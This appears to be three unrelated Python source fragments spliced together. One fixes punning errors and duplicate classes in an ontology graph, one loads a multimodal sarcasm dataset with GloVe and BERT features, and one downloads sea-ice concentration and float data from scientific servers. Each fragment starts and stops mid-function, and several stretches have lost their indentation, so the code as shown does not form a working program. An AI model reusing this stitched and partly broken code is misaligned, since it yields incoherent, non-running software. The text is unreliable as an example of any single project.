    self.ontology_info[key]['Deprecated'] = dep_cls if len(dep_cls) > 0 else 'None'
    # BUGFIX: the stored value previously omitted obs_oth even though the guard checked
    # obs_cls | obs_oth, recording an empty set when only obs_oth matched.
    self.ontology_info[key]['Obsolete'] = (obs_cls | obs_oth) if len(obs_cls | obs_oth) > 0 else 'None'

    return None
def fixes_punning_errors(self) -> None:
    """Identifies and resolves three types of punning or entity redeclaration errors:
        (1) Entities typed as an owl:Class and owl:ObjectProperty --> removes owl:ObjectProperty
        (2) Entities typed as an owl:Class and owl:NamedIndividual --> removes owl:NamedIndividual
        (3) Entities typed as an OWL:ObjectProperty and owl:AnnotationProperty --> removes owl:AnnotationProperty
            - Any owl:ObjectProperty redeclared as an owl:AnnotationProperty never used in other triples are removed

    Returns:
        None.
    """
    log_str = 'Resolving Punning Errors'; print(log_str); logger.info(log_str)

    key, bad_cls, bad_obj = self.ont_file_location, set(), set()
    # every subject in the graph; materialized as a set so iteration is over a snapshot
    onts_entities = set([x[0] for x in tqdm(self.ont_graph)])
    for x in tqdm(onts_entities):
        ent_types = list(self.ont_graph.triples((x, RDF.type, None)))
        if len(ent_types) > 1:  # entity declared with more than one rdf:type
            # only handle entities whose declared types are all in the owl namespace
            if not any([x for x in ent_types if 'owl' not in str(x[2])]):
                # class + object properties --> remove object properties
                class_prop, obj_prop = (x, RDF.type, OWL.Class), (x, RDF.type, OWL.ObjectProperty)
                if class_prop in ent_types and obj_prop in ent_types and str(x) not in bad_cls:
                    self.ont_graph.remove(obj_prop); bad_cls.add(str(x))
                # class + individual --> remove individual
                class_prop, ind_prop = (x, RDF.type, OWL.Class), (x, RDF.type, OWL.NamedIndividual)
                if class_prop in ent_types and ind_prop in ent_types and str(x) not in bad_cls:
                    self.ont_graph.remove(ind_prop); bad_cls.add(str(x))
                # object property + annotation property --> remove annotation property
                obj_prop, a_prop = (x, RDF.type, OWL.ObjectProperty), (x, RDF.type, OWL.AnnotationProperty)
                if obj_prop in ent_types and a_prop in ent_types and str(x) not in bad_obj:
                    self.ont_graph.remove(a_prop); bad_obj.add(str(x))
                    # check if the object property is used beyond definition -- if not, delete it
                    e = set(self.ont_graph.triples((x, None, None))) | set(self.ont_graph.triples((None, None, x)))
                    # triples whose subject is a Class/NamedIndividual, or which appear in a
                    # someValuesFrom restriction, count as "real" usage of the property
                    val_nodes = [i for i in e if len(
                        [j[2] for j in list(self.ont_graph.triples((i[0], RDF.type, OWL.Class)))] +
                        [j[2] for j in list(self.ont_graph.triples((i[0], RDF.type, OWL.NamedIndividual)))] +
                        [j[2] for j in list(self.ont_graph.triples((None, OWL.someValuesFrom, i[0])))]) > 0]
                    if len(val_nodes) == 0: self.ont_graph.remove((x, None, None))
    self.ontology_info[key]['PunningErrors - Classes'] = ', '.join(bad_cls) if len(bad_cls) > 0 else 'None'
    self.ontology_info[key]['PunningErrors - ObjectProperty'] = ', '.join(bad_obj) if len(bad_obj) > 0 else 'None'

    return None
def normalizes_duplicate_classes(self) -> None:
    """Connects classes that represent the same concept across ontologies.

    Several ontologies used in the current PheKnowLator build (e.g. the Sequence Ontology,
    ChEBI and the PRotein Ontology for "protein") each declare their own class for the same
    concept without linking them. To avoid multiple disconnected versions of one concept,
    each duplicate is asserted as an rdfs:subClassOf the canonical class used in the build:
        - Gene: VO OGG_0000000002. Make the OGG class a subclass of SO gene (SO_0000704)
        - Protein: SO_0000104, PR_000000001, CHEBI_36080. Make CHEBI and PR a subclass of SO protein (SO_0000104)
        - Disorder: VO OGMS_0000045. Make OGMS a subclass of MONDO disease (MONDO_0000001)
        - Antigen: VO OBI_1110034. Make OBI a subclass of CHEBI antigen (CHEBI_59132)
        - Gelatin: VO_0003030. Make the VO a subclass of CHEBI gelatin (CHEBI_5291)
        - Hormone: VO FMA_12278. Make FMA a subclass of CHEBI hormone (CHEBI_24621)

    Returns:
        None.
    """
    log_str = 'Normalizing Duplicate Concepts'; print(log_str); logger.info(log_str)

    # (duplicate class, canonical parent) pairs asserted as rdfs:subClassOf edges
    subclass_fixes = (
        (obo.OGG_0000000002, obo.SO_0000704),    # gene
        (obo.PR_000000001, obo.SO_0000104),      # protein
        (obo.CHEBI_36080, obo.SO_0000104),       # protein
        (obo.OGMS_0000045, obo.MONDO_0000001),   # disorder
        (obo.OBI_1110034, obo.CHEBI_59132),      # antigen
        (obo.VO_0003030, obo.CHEBI_5291),        # gelatin
        (obo.FMA_12278, obo.CHEBI_24621),        # hormone
    )
    for duplicate_cls, canonical_cls in subclass_fixes:
        self.ont_graph.add((duplicate_cls, RDFS.subClassOf, canonical_cls))

    # update ontology information dictionary
    results = ['OGG_0000000002 rdfs:subClassOf SO_0000704', 'PR_000000001 rdfs:subClassOf SO_0000104',
               'CHEBI_36080 rdfs:subClassOf SO_0000104', 'OGMS_0000045 rdfs:subClassOf MONDO_0000001',
               'OBI_1110034 rdfs:subClassOf CHEBI_59132', 'VO_0003030 rdfs:subClassOf CHEBI_5291',
               'FMA_12278 rdfs:subClassOf CHEBI_24621']
    self.ontology_info[self.ont_file_location]['Normalized - Duplicates'] = ', '.join(results)

    return None
def normalizes_existing_classes(self) -> None:
"""Checks for inconsistencies in ontology classes that overlap with non-ontology entity identifiers (e.g. if
HP includes HGNC identifiers, but PheKnowLator utilizes Entrez gene identifiers). While there are other types of
identifiers, we focus primarily on resolving the genomic types, since we have a master dictionary we can used to
help with this (Merged_gene_rna_protein_identifiers.pkl). This can be updated in future iterations to include
other types of identifiers, but given our detailed examination of the v2.0.0 ontologies, these were the
identifier types that needed repair.
Note. In the future, this method can be expanded to replace identifiers in annotation axioms (i.e. updating
Literals, in addition to the URIRefs that currently being updated).
Returns:
None.
"""
log_str = 'Normalizing Existing Classes'; print(log_str); logger.info(log_str)
ents, missing = None, []
non_ont = set([x for x in gets_ontology_classes(self.ont_graph)])
hgnc = set([x for x in non_ont if 'hgnc' in str(x).lower()])
url, g = 'http://www.ncbi.nlm.nih.gov/gene/', self.gene_ids
for node in tqdm(hgnc):
trips = list(self.ont_graph.triples((node, None, None))) + list(self.ont_graph.triples((None, None, node)))
nd = 'hgnc_id_' + re.findall(r'\d.*', str(node).split('/')[-1])[0]
gene_dat = [str(x[2]).strip(' (human)') for x in trips if x[1] == RDFS.label]
if nd in g.keys():
ents = [URIRef(url + x.split('_')[-1]) | |
import os
import sys
import re
import json
import pickle
import h5py
import nltk
import numpy as np
import jsonlines
from collections import defaultdict
from sklearn.model_selection import StratifiedKFold
import config
def pickle_loader(filename):
    """Load a pickle file, bridging the Python 2/3 bytes/str pickling gap.

    Args:
        filename: path to the pickle file.

    Returns:
        The unpickled object.
    """
    # Use a context manager so the file handle is closed even if
    # pickle.load() raises (the original leaked the open handle).
    with open(filename, 'rb') as f:
        if sys.version_info[0] < 3:
            return pickle.load(f)
        # latin1 lets Python 3 read pickles produced by Python 2.
        return pickle.load(f, encoding="latin1")
class AudioDataLoader:
    """Loads the sarcasm dataset json together with whichever feature
    modalities are enabled in `config` (audio, video, target/context BERT
    embeddings), and prepares the stratified k-fold and speaker-independent
    splits plus a cached GloVe dictionary restricted to the dataset
    vocabulary."""

    # Input data and cache file locations.
    DATA_PATH_JSON = "./data/sarcasm_data.json"
    AUDIO_PICKLE = "./data/audio_features.p"
    INDICES_FILE = "./data/split_indices.p"
    GLOVE_DICT = "./data/glove_full_dict.p"
    BERT_TARGET_EMBEDDINGS = "./data/bert-output.jsonl"
    BERT_CONTEXT_EMBEDDINGS = "./data/bert-output-context.jsonl"

    # Field positions inside each data_input tuple (see parseData).
    UTT_ID = 0
    CONTEXT_ID = 2
    SHOW_ID = 5

    # Reserved vocabulary tokens.
    UNK_TOKEN = "<UNK>"
    PAD_TOKEN = "<PAD>"

    def __init__(self, config):
        """Load the dataset plus enabled feature modalities, then build the
        k-fold and speaker-independent splits and the GloVe cache.

        Args:
            config: experiment configuration with use_bert/use_context/
                use_target_text/use_target_audio/use_target_video flags.
        """
        self.config = config
        # NOTE(review): the open() handle here is never closed explicitly.
        dataset_json = json.load(open(self.DATA_PATH_JSON))
        # Target-utterance BERT features: mean of the CLS vector over the
        # first four listed layers of the exported jsonl.
        if config.use_bert and config.use_target_text:
            text_bert_embeddings = []
            with jsonlines.open(self.BERT_TARGET_EMBEDDINGS) as reader:
                # Visit each target utterance
                for obj in reader:
                    CLS_TOKEN_INDEX = 0
                    features = obj['features'][CLS_TOKEN_INDEX]
                    bert_embedding_target = []
                    for layer in [0,1,2,3]:
                        bert_embedding_target.append(np.array(features["layers"][layer]["values"]))
                    bert_embedding_target = np.mean(bert_embedding_target, axis=0)
                    text_bert_embeddings.append(np.copy(bert_embedding_target))
        else:
            text_bert_embeddings = None
        # Context BERT features: one list of sentence vectors per instance.
        if config.use_context:
            context_bert_embeddings = self.loadContextBert(dataset_json)
        else:
            context_bert_embeddings = None
        if config.use_target_audio:
            audio_features = pickle_loader(self.AUDIO_PICKLE)
        else:
            audio_features = None
        if config.use_target_video:
            # NOTE(review): h5py.File opened without an explicit mode;
            # recent h5py versions require 'r' to be passed — confirm.
            video_features_file = h5py.File('data/features/utterances_final/resnet_pool5.hdf5')
            context_video_features_file = h5py.File('data/features/context_final/resnet_pool5.hdf5')
        else:
            video_features_file = None
            context_video_features_file = None
        self.parseData(dataset_json, audio_features, video_features_file, context_video_features_file, text_bert_embeddings, context_bert_embeddings)
        if config.use_target_video:
            video_features_file.close()
            context_video_features_file.close()
        self.StratifiedKFold()
        self.setupGloveDict()
        # Setup speaker independent split
        self.speakerIndependentSplit()

    def parseData(self, json, audio_features, video_features_file=None, context_video_features_file=None, text_bert_embeddings=None, context_bert_embeddings=None):
        '''
        Prepares json data into lists
        data_input = [ (utterance:string, speaker:string, context:list_of_strings, context_speakers:list_of_strings, utterance_audio:features ) ]
        data_output = [ sarcasm_tag:int ]
        '''
        # NOTE: the `json` parameter shadows the module-level json import
        # inside this method; it is the already-parsed dataset dict.
        # NOTE(review): the video/BERT feature arguments are accepted but not
        # used in this method body — presumably consumed by a fuller variant
        # of this loader; confirm.
        self.data_input, self.data_output = [], []
        for idx, ID in enumerate(json.keys()):
            self.data_input.append((json[ID]["utterance"], json[ID]["speaker"], json[ID]["context"],
                                    json[ID]["context_speakers"], audio_features[ID] if audio_features else None,
                                    json[ID]["show"]))
            self.data_output.append( int(json[ID]["sarcasm"]) )

    def loadContextBert(self, dataset, ):
        """Load per-sentence context BERT embeddings and regroup them so each
        target utterance receives the list of its own context vectors.

        Args:
            dataset: the sarcasm-dataset dict (id -> instance).

        Returns:
            List (one entry per instance) of lists of context sentence vectors.
        """
        # Prepare context video length list
        length=[]
        for idx, ID in enumerate(dataset.keys()):
            length.append(len(dataset[ID]["context"]))
        # Load BERT embeddings
        with jsonlines.open(self.BERT_CONTEXT_EMBEDDINGS) as reader:
            context_utterance_embeddings=[]
            # Visit each context utterance
            for obj in reader:
                CLS_TOKEN_INDEX = 0
                features = obj['features'][CLS_TOKEN_INDEX]
                bert_embedding_target = []
                # Mean of the CLS vector over the four exported layers.
                for layer in [0,1,2,3]:
                    bert_embedding_target.append(np.array(features["layers"][layer]["values"]))
                bert_embedding_target = np.mean(bert_embedding_target, axis=0)
                context_utterance_embeddings.append(np.copy(bert_embedding_target))
        # Checking whether total context features == total context sentences
        assert(len(context_utterance_embeddings)== sum(length))
        # Rearrange context features for each target utterance using the
        # cumulative sentence counts as slice boundaries.
        cumulative_length = [length[0]]
        cumulative_value = length[0]
        for val in length[1:]:
            cumulative_value+=val
            cumulative_length.append(cumulative_value)
        assert(len(length)==len(cumulative_length))
        end_index = cumulative_length
        start_index = [0]+cumulative_length[:-1]
        final_context_bert_features = []
        for start, end in zip(start_index, end_index):
            local_features = []
            for idx in range(start, end):
                local_features.append(context_utterance_embeddings[idx])
            final_context_bert_features.append(local_features)
        return final_context_bert_features

    def StratifiedKFold(self, splits=5):
        '''
        Prepares or loads (if existing) splits for k-fold
        '''
        # Note: `StratifiedKFold` below resolves to the sklearn class imported
        # at module level (this method's name is only a class attribute).
        skf = StratifiedKFold(n_splits=splits, shuffle=True)
        split_indices = [(audio_train_index, audio_text_index) for audio_train_index, audio_text_index in skf.split(self.data_input, self.data_output)]
        # NOTE(review): shuffle is unseeded, so freshly generated folds are
        # non-deterministic; they are only persisted when no cache exists.
        if not os.path.exists(self.INDICES_FILE):
            pickle.dump(split_indices, open(self.INDICES_FILE, 'wb'), protocol=2)

    def getStratifiedKFold(self):
        '''
        Returns train/test indices for k-folds
        '''
        # Always reads the cached indices written by StratifiedKFold().
        self.split_indices = pickle_loader(self.INDICES_FILE)
        return self.split_indices

    def speakerIndependentSplit(self):
        '''
        Prepares split for speaker independent setting
        Train: Fr, TGG, Sa
        Test: TBBT
        '''
        # Instances whose show id equals "BBT" form the held-out test set.
        self.train_ind_SI, self.test_ind_SI = [], []
        for ind, data in enumerate(self.data_input):
            if data[self.SHOW_ID] == "BBT":
                self.test_ind_SI.append(ind)
            else:
                self.train_ind_SI.append(ind)

    def getSpeakerIndependent(self):
        '''
        Returns the split indices of speaker independent setting
        '''
        return self.train_ind_SI, self.test_ind_SI

    def getSplit(self, indices):
        '''
        Returns the split comprising of the indices
        '''
        data_input = [self.data_input[ind] for ind in indices]
        data_output = [self.data_output[ind] for ind in indices]
        return data_input, data_output

    def fullDatasetVocab(self):
        '''
        Return the full dataset's vocabulary to filter and cache glove embedding dictionary
        '''
        # word (lower-cased) -> occurrence count over utterances + contexts.
        vocab = defaultdict(lambda:0)
        utterances = [instance[self.UTT_ID] for instance in self.data_input]
        contexts = [instance[self.CONTEXT_ID] for instance in self.data_input]
        for utterance in utterances:
            clean_utt = AudioDataHelper.clean_str(utterance)
            utt_words = nltk.word_tokenize(clean_utt)
            for word in utt_words:
                vocab[word.lower()] += 1
        for context in contexts:
            for c_utt in context:
                clean_utt = AudioDataHelper.clean_str(c_utt)
                utt_words = nltk.word_tokenize(clean_utt)
                for word in utt_words:
                    vocab[word.lower()] += 1
        return vocab

    def setupGloveDict(self):
        '''
        Caching the glove dictionary based on all the words in the dataset.
        This cache is later used to create appropriate dictionaries for each fold's training vocabulary
        '''
        assert(self.config.word_embedding_path is not None)
        # Vocabulary of the full dataset
        vocab = self.fullDatasetVocab()
        if os.path.exists(self.GLOVE_DICT):
            self.wordemb_dict = pickle_loader(self.GLOVE_DICT)
        else:
            self.wordemb_dict = {}
            # NOTE(review): file handle below is never closed explicitly.
            for line in open(self.config.word_embedding_path,'r'):
                splitLine = line.split()
                word = splitLine[0]
                try:
                    embedding = np.array([float(val) for val in splitLine[1:]])
                    # Filter glove words based on its presence in the vocab
                    if word.lower() in vocab:
                        self.wordemb_dict[word.lower()] = embedding
                except:
                    # NOTE(review): bare except skips malformed lines silently
                    # beyond the print; a narrower `except ValueError` would
                    # avoid masking unrelated errors.
                    print("Error word in glove file (skipped): ", word)
                    continue
            # Reserved embeddings: zeros for <PAD>, small random for <UNK>.
            self.wordemb_dict[self.PAD_TOKEN] = np.zeros(self.config.embedding_dim)
            self.wordemb_dict[self.UNK_TOKEN] = np.random.uniform(-0.25,0.25,self.config.embedding_dim)
            pickle.dump(self.wordemb_dict, open(self.GLOVE_DICT, "wb"))
class AudioDataHelper:
    """Per-fold feature helper: builds the train-split vocabulary, loads the
    matching GloVe subset and assembles the embedding matrix used to
    vectorise utterances for one train/test split."""

    # Field positions inside each instance tuple.
    # NOTE(review): AudioDataLoader.parseData produces 6-field tuples; the
    # indices >= 5 below assume an extended tuple assembled elsewhere
    # (video/BERT features appended) — confirm against the caller.
    UTT_ID = 0
    SPEAKER_ID = 1
    CONTEXT_ID = 2
    CONTEXT_SPEAKERS_ID = 3
    TARGET_AUDIO_ID = 4
    TARGET_VIDEO_ID = 5
    CONTEXT_VIDEO_ID = 6
    TEXT_BERT_ID = 7
    CONTEXT_BERT_ID = 8

    # Reserved embedding-matrix rows and their tokens.
    PAD_ID = 0
    UNK_ID = 1
    PAD_TOKEN = "<PAD>"
    UNK_TOKEN = "<UNK>"

    # Per-fold GloVe cache paths ({} is filled with the fold id).
    GLOVE_MODELS = "./data/temp/glove_dict_{}.p"
    GLOVE_MODELS_CONTEXT = "./data/temp/glove_dict_context_{}.p"
    def __init__(self, audio_train_input, audio_train_output, audio_test_input, audio_test_output, config, dataLoader):
        """Store the fold's split, build its vocabulary, load/cache the
        fold-specific GloVe subset and assemble the embedding matrix.

        Args:
            audio_train_input: list of train instance tuples.
            audio_train_output: train labels.
            audio_test_input: list of test instance tuples.
            audio_test_output: test labels.
            config: experiment configuration (fold id, use_context, ...).
            dataLoader: AudioDataLoader holding the cached full GloVe dict.
        """
        self.dataLoader = dataLoader
        self.config = config
        self.audio_train_input = audio_train_input
        self.audio_train_output = audio_train_output
        self.audio_test_input = audio_test_input
        self.audio_test_output = audio_test_output
        # create vocab for current split train set
        self.createVocab(config.use_context)
        print("vocab size: " + str(len(self.vocab)))
        self.loadGloveModelForCurrentSplit(config.use_context)
        self.createEmbeddingMatrix()
@staticmethod
def clean_str(string):
'''
Tokenization/string cleaning.
'''
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\"", " \" ", string)
string = re.sub(r"\(", " ( ", string)
string = re.sub(r"\)", " ) ", string)
string = re.sub(r"\?", " ? ", string)
string = re.sub(r"\s{2,}", " ", string)
string = re.sub(r"\.", " . ", string)
string = re.sub(r".\, ", " , ", string)
string = re.sub(r"\\n", " ", string)
return string.strip().lower()
def getData(self, ID=None, mode=None, error_message=None):
if mode == "train":
return [instance[ID] for instance in self.audio_train_input]
elif mode == "test":
return [instance[ID] for instance in self.audio_test_input]
else:
print(error_message)
exit()
def createVocab(self, use_context=False):
self.vocab = vocab = defaultdict(lambda:0)
utterances = self.getData(self.UTT_ID, mode="train")
for utterance in utterances:
clean_utt = self.clean_str(utterance)
utt_words = nltk.word_tokenize(clean_utt)
for word in utt_words:
vocab[word.lower()] += 1
# Add vocabulary fron context sentences of train split if context is used
if use_context:
context_utterances = self.getData(self.CONTEXT_ID, mode="train")
for context in context_utterances:
for c_utt in context:
clean_utt = self.clean_str(c_utt)
utt_words = nltk.word_tokenize(clean_utt)
for word in utt_words:
vocab[word.lower()] += 1
    def loadGloveModelForCurrentSplit(self, use_context=False):
        '''
        Loads the Glove pre-trained model for the current split

        Sets self.model (word -> embedding for this fold's train vocab) and
        self.embed_dim, using a per-fold pickle cache when available.
        '''
        print("Loading glove model")
        # if model already exists:
        filename = self.GLOVE_MODELS_CONTEXT if use_context else self.GLOVE_MODELS
        filename = filename.format(self.config.fold)
        if not os.path.exists(os.path.dirname(filename)):
            os.makedirs(os.path.dirname(filename))
        if os.path.exists(filename):
            # Cached per-fold dictionary; dimensionality taken from <PAD>.
            self.model = pickle_loader(filename)
            self.embed_dim = len(self.dataLoader.wordemb_dict[self.PAD_TOKEN])
        else:
            self.model = model = {}
            self.embed_dim = 0
            # Further filter glove dict words to contain only train set vocab for current fold
            for word, embedding in self.dataLoader.wordemb_dict.items():
                if word in self.vocab: model[word.lower()] = embedding
                # NOTE(review): embed_dim is reassigned on every iteration
                # (not only for kept words) and stays 0 if wordemb_dict is
                # empty — confirm this is intended.
                self.embed_dim = len(embedding)
            pickle.dump(self.model, open(filename, "wb"), protocol=2)
def createEmbeddingMatrix(self):
"""
Get word matrix. W[i] is the vector for word indexed by i
also creates word_idx_map : to map all words to proper index of i for associated
embedding matrix W
"""
vocab_size = len(self.model) # length of filtered glove embedding words
self.word_idx_map = word_idx_map = dict()
self.W = W = np.zeros(shape=(vocab_size+2, self.embed_dim), dtype='float32')
# Pad and Unknown
W[self.PAD_ID] = self.dataLoader.wordemb_dict[self.PAD_TOKEN]
W[self.UNK_ID] = self.dataLoader.wordemb_dict[self.UNK_TOKEN]
word_idx_map[self.PAD_TOKEN] = self.PAD_ID
word_idx_map[self.UNK_TOKEN] = self.UNK_ID
# Other words
i = 2
for word in self.model:
if (word != self.PAD_TOKEN) and (word != self.UNK_TOKEN):
W[i] = np.copy(self.model[word])
word_idx_map[word] = i
i += 1
# Make words not in glove as unknown
for word in self.vocab:
if word not in self.model:
word_idx_map[word] = self.UNK_ID
    def getEmbeddingMatrix(self):
        # Accessor for the matrix built by createEmbeddingMatrix().
        return self.W
def wordToIndex(self, utterance):
word_indices = [self.word_idx_map.get(word, self.UNK_ID) for word in nltk.word_tokenize(self.clean_str(utterance))]
#padding to max_sent_length
word_indices = word_indices[:self.config.max_sent_length]
word_indices = word_indices + [self.PAD_ID]*(self.config.max_sent_length - len(word_indices))
assert(len(word_indices) == self.config.max_sent_length)
return word_indices
def getTargetBertFeatures(self, mode=None):
utterances = self.getData(self.TEXT_BERT_ID, mode,
"Set mode properly for vectorizeUtterance method() : mode = train/test")
return utterances
def getContextBertFeatures(self, mode=None):
utterances = self.getData(self.CONTEXT_BERT_ID, mode,
"Set mode properly for vectorizeUtterance method() : mode = train/test")
mean_features=[]
for utt in utterances:
mean_features.append(np.mean(utt, axis=0))
return np.array(mean_features)
def vectorizeUtterance(self, mode=None):
utterances = self.getData(self.UTT_ID, mode,
"Set mode properly for vectorizeUtterance method() : mode = train/test")
vector_utt | |
SOCCOM float profiles in text format from FloatViz FTP server.
Args:
save_to_root: path of main Argo data directory of interest
"""
save_to_floats = save_to_root + 'SOCCOM_HiResQC_ftp_' + datetime.today().strftime('%Y-%m-%d') + '/'
os.mkdir(save_to_floats)
ftp_root = 'ftp.mbari.org'
url_root = 'pub/SOCCOM/FloatVizData/HRQC/'
df.all_files(ftp_root,url_root,save_to_floats,overwrite=overwrite_profs)
# do a find-and-replace on data files to remove whitespace between some column names
for data_filename in os.listdir(save_to_floats):
orig_file_as_list = codecs.open(save_to_floats + data_filename,'rb',encoding='latin-1').readlines()
new_file_as_list = []
for line in orig_file_as_list:
first_edit = line.replace('Lon [°E]', 'Lon[°E]')
second_edit = first_edit.replace('Lat [°N]', 'Lat[°N]')
new_file_as_list.append(second_edit)
out_file = codecs.open(save_to_floats + data_filename,'wb',encoding='latin-1')
out_file.writelines(new_file_as_list)
out_file.close()
def amsr(which_amsr, start_date, end_date, save_to, get_pdfs=True, overwrite=False, convert=False, conversion_script_dir=None):
    """ Downloads AMSR-E or AMSR2 sea ice concentration product.
    Converts data from HDF4 to HDF5 format by calling df.convert_to_hdf5() if 'convert'
    is True, then deletes original HDF4 file.
    AMSR-2:
        AMSR2 6.25 km daily sea ice concentration product is ARTIST Sea Ice (ASI)
        algorithm from 89 GHz channel, a preliminary data product that uses the
        AMSR-E calibrations.
        Example file path: http://www.iup.uni-bremen.de:8084/amsr2data/asi_daygrid_swath/s6250/2015/aug/Antarctic/asi-AMSR2-s6250-20150801-v5.hdf
    AMSR-E:
        AMSR-E 6.25 km daily sea ice concentration product is ARTIST Sea Ice (ASI)
        algorithm from 89 GHz channel.
        Example file path: http://iup.physik.uni-bremen.de:8084/amsredata/asi_daygrid_swath/l1a/s6250/2011/oct/Antarctic/asi-s6250-20111004-v5.hdf
    Required data acknowledgement: Spreen et al. (2008), doi:10.1029/2005JC003384
    Optional data acknowledgement (for AMSR2): Beitsch et al. (2014), doi:10.3390/rs6053841
    Args:
        which_amsr: if 1, download AMSR-E; if 2, download AMSR2
        start_date and end_date: (Y,M,D), with start/end inclusive
        save_to: directory path
        get_pdfs: download image files
        overwrite: re-download files that already exist
        convert: convert HDF4 downloads to HDF5 and delete the originals
        conversion_script_dir: directory of the HDF4->HDF5 conversion script
    Returns:
        None
    Raises:
        ValueError: if which_amsr is neither 1 nor 2
    """
    if which_amsr == 2:
        url_part1 = 'http://www.iup.uni-bremen.de:8084/amsr2data/asi_daygrid_swath/s6250/'
        filename_part1 = 'asi-AMSR2-s6250-'
    elif which_amsr == 1:
        url_part1 = 'http://iup.physik.uni-bremen.de:8084/amsredata/asi_daygrid_swath/l1a/s6250/'
        filename_part1 = 'asi-s6250-'
    else:
        # Previously an unrecognized value left the URL variables undefined
        # and crashed later with NameError; fail fast instead.
        raise ValueError('which_amsr must be 1 (AMSR-E) or 2 (AMSR2)')
    url_part2 = '/Antarctic/'
    filename_part2 = '-v5.hdf'
    # Bug fix: these PDF suffixes were defined only in the AMSR-E branch, so
    # requesting PDFs (the default) for AMSR2 raised NameError. The suffixes
    # are assumed identical for both products — TODO confirm for AMSR2.
    filename_part2_pdf1 = '-v5_nic.pdf'
    filename_part2_pdf2 = '-v5_visual.pdf'
    months = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']
    # Snapshot existing downloads once so already-converted files are skipped.
    starting_dir = os.getcwd()
    os.chdir(save_to)
    existing_files = os.listdir()
    os.chdir(starting_dir)
    all_dates = tt.dates_in_range(start_date, end_date)
    for index, d in enumerate(all_dates):
        url_dir = url_part1 + str(d[0]) + '/' + months[d[1]-1] + url_part2
        filename = filename_part1 + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2
        new_filename = filename.split('.')[0] + '.h5'
        # Download when the converted file is absent, or when overwriting.
        if (new_filename not in existing_files) or overwrite:
            df.single_file(url_dir, filename, save_to, overwrite)
            if convert:
                df.convert_to_hdf5(conversion_script_dir, filename, save_to, save_to, overwrite=overwrite, delete_original=True)
        if get_pdfs:
            pdf1name = filename_part1 + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2_pdf1
            pdf2name = filename_part1 + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2_pdf2
            df.single_file(url_dir, pdf1name, save_to, overwrite)
            df.single_file(url_dir, pdf2name, save_to, overwrite)
        df.how_far(index,all_dates,0.01)
def dmsp_nrt(start_date, end_date, save_to, overwrite=False):
    """ Downloads NSIDC 25 km preliminary Near Real-Time (NRT) sea ice concentration product.
    NSIDC's v1 daily SSMIS product on 25 km grid in netCDF-4 (HDF5) format. Product derived from 3 channels. Data files
    contain the following:
    - NRT CDR (Climate Data Record) product based on DMSP SSMIS currently from 2016-01-01 to present, using purely
      automated application and merging of the NASA Team (NT) and Bootstrap (BT) algorithms.
      (The NRT product does not contain Goddard Merged fields.)
    Information: https://nsidc.org/data/g10016
    Example file path: ftp://sidads.colorado.edu/pub/DATASETS/NOAA/G10016/south/daily/2016/seaice_conc_daily_icdr_sh_f17_20160101_v01r00.nc
    Expert guidance on the related CDR record:
    https://climatedataguide.ucar.edu/climate-data/sea-ice-concentration-noaansidc-climate-data-record
    Required data acknowledgement given in full under 'Citing This Data' here: http://dx.doi.org/10.7265/N5FF3QJ6.
    """
    ftp_root = 'sidads.colorado.edu'
    url_root = 'pub/DATASETS/NOAA/G10016/south/daily/'
    filename_part1 = 'seaice_conc_daily_icdr_sh_'
    filename_part2 = '_v01r00.nc'
    # Satellite eras: f17 through 2016-03-30, then f18 to the present.
    sat_abbrevs = ['f17','f18']
    sat_start_dates = [(2016,1,1),(2016,4,1)]
    sat_end_dates = [(2016,3,30),tt.now()]
    all_dates = tt.dates_in_range(start_date, end_date)
    for index, d in enumerate(all_dates):
        if not tt.is_time_in_range(sat_start_dates[0],sat_end_dates[-1],d):
            raise ValueError('Given date range exceeds hard-coded satellite date ranges.')
        # Pick the satellite whose operational window covers this date.
        for sat in range(0,len(sat_abbrevs)):
            if tt.is_time_in_range(sat_start_dates[sat], sat_end_dates[sat], d):
                sat_abbrev = sat_abbrevs[sat]
        filename = filename_part1 + sat_abbrev + '_' + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2
        starting_dir = os.getcwd()
        try:
            # Bug fix: the original used `is not`, which tests string identity,
            # not equality; two equal path strings would still trigger chdir
            # (harmless) but the intent is clearly an equality comparison.
            if starting_dir != save_to:
                os.chdir(save_to)
            if filename not in os.listdir() or overwrite:
                # NOTE(review): df.single_file is always called with
                # overwrite=False here; the overwrite flag only forces a
                # re-attempt via the listdir check — confirm intent.
                df.single_file(url_root + '{0[0]}/'.format(d), filename, save_to, ftp_root=ftp_root, overwrite=False, auth=None)
        finally:
            os.chdir(starting_dir)
        df.how_far(index, all_dates, 0.1)
def dmsp_v3(start_date, end_date, save_to, overwrite=False):
    """ Downloads NSIDC 25 km sea ice concentration product.
    NSIDC's v3 r1 daily SMMR + SSM/I + SSMIS product on 25 km grid in netCDF-4 (HDF5) format. Product derived from
    3 channels. Data files contain the following:
    - CDR (Climate Data Record) product based on DMSP SSM/I and SSMIS from 1987-07-09 onwards, using purely automated
      application and merging of the NASA Team (NT) and Bootstrap (BT) algorithms.
    - GSFC (NASA Goddard Space Flight Center) merged product based on the above, plus Nimbus-7 SMMR from 1978-11-01
      onwards (every other day). Some manual quality control, interpolation, and editing has been conducted (but without
      provenance), meaning that GSFC is a higher-quality but less uniform record than CDR.
    Information: https://nsidc.org/data/g02202
    Example file path: ftp://sidads.colorado.edu/pub/DATASETS/NOAA/G02202_V3/south/daily/1978/seaice_conc_daily_sh_n07_19781101_v03r01.nc
    Expert guidance on these records:
    https://climatedataguide.ucar.edu/climate-data/sea-ice-concentration-noaansidc-climate-data-record
    Required data acknowledgement given in full under 'Citing This Data' here: http://dx.doi.org/10.7265/N59P2ZTG.
    """
    ftp_root = 'sidads.colorado.edu'
    url_root = 'pub/DATASETS/NOAA/G02202_V3/south/daily/'
    filename_part1 = 'seaice_conc_daily_sh_'
    filename_part2 = '_v03r01.nc'
    # Satellite eras for SMMR (n07) and the SSM/I / SSMIS series.
    sat_abbrevs = ['n07','f08','f11','f13','f17']
